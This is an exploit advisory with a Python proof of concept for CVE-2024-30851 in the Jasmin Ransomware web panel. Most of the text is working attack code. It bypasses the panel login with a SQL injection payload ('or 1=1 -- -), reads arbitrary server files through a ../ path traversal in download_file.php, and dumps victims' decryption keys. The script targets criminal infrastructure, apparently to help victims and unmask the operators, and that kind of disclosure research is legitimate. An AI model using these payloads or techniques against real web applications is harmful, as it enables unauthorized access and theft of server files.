Headline
Jasmin Ransomware 1.1 Arbitrary File Read
Jasmin Ransomware version 1.1 suffers from an arbitrary file read vulnerability.
# Exploit Title: Jasmin Ransomware arbitrary file read# Date: 2024-04-04# Exploit Author: @_chebuya# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware# Version: v1.1# Tested on: Ubuntu 20.04 LTS# CVE: CVE-2024-30851# Description: Jasmin Ransomware panel contains multiple SQL injections and authorization issues, allowing a remote unauthenticated attacker to read arbitrary files off the server and bypass the login# Github: https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc/tree/mainimport requestsimport argparseimport osfrom bs4 import BeautifulSoupdef get_file(jasmin_url, filepath): response = requests.get( f'{jasmin_url}/download_file.php?file={filepath}', allow_redirects=False ) return response.textdef get_keys(jasmin_url): headers = { 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', } data = "username=&password='+or+1%3D1+--+-&service=login" login_req = requests.post(f'{jasmin_url}/checklogin.php', headers=headers, data=data) cookies = login_req.cookies list_req = requests.get(f'{jasmin_url}/dashboard.php', cookies=cookies) soup = BeautifulSoup(list_req.text, 'html.parser') rows = soup.find_all('tr') print(f"Dumping decryption keys from {len(rows)-1} victims") for row in rows: data = row.find_all('td') if len(data) == 0: continue username = data[1].get_text() hostname = data[0].get_text() filepath = data[7].find('a')['href'].split("=")[1] print(f"Decryption key for {username}@{hostname}: {get_file(jasmin_url, filepath)}")parser = argparse.ArgumentParser(description="LFD/SQLi Exploit PoC for Jasmin Ransomware panel")subparser = parser.add_subparsers(dest='subcommand')file_parser = subparser.add_parser("getfile", help="Read a file off the server")file_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")file_parser.add_argument("-f", "--file", default="c:/xampp/apache/logs/access.log", help="The file to read on the target server") # Default is the access log, deanonymize the operators!keys_parser = subparser.add_parser("getkeys", help="Get decryption keys of victims")keys_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")args = parser.parse_args()if args.subcommand != None: target_url = args.url.rstrip("/")if args.subcommand == "getkeys": get_keys(target_url)elif args.subcommand == "getfile": target_file = args.file.replace("\\", "/").replace("c:", "") target_path = os.path.join("../../../../../../../../../", target_file) print(get_file(target_url, target_path))else: parser.print_help()